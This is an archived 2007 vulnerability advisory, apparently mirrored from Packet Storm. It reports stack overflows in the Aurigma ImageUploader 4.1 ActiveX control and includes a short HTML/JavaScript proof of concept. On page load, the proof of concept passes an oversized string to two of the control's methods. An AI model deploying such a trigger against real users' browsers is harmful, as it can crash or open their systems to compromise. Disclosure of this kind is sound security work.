Lucene search
K

aurigma-overflows.txt

🗓️ 26 Nov 2007 00:00:00Reported by Elazar BroadType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

There are stack overflows in Aurigma ImageUploader 4.1 ActiveX control installed by www.dotphoto.co

Code
`There are multiple stack overflows in the Aurigma ImageUploader 4.1 ActiveX control. I believe this control was installed by www.dotphoto.com. PoC as follows:  
  
-----------------------  
<!--  
written by e.b.  
-->  
<html>  
<head>  
<script language="JavaScript" DEFER>  
function Check() {  
var s = "AAAA";  
  
while (s.length < 999999) s=s+s;  
  
var obj = new ActiveXObject("Aurigma.ImageUploader.4.1"); //{6E5E167B-1566-4316-B27F-0DDAB3484CF7}  
obj.GotoFolder(s);  
obj.CanGotoFolder(s);  
  
}  
</script>  
  
</head>  
<body onload="JavaScript: return Check();">  
</body>  
</html>   
  
-----------------------  
  
  
Elazar  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Nov 2007 00:00Current
7.4High risk
Vulners AI Score7.4
20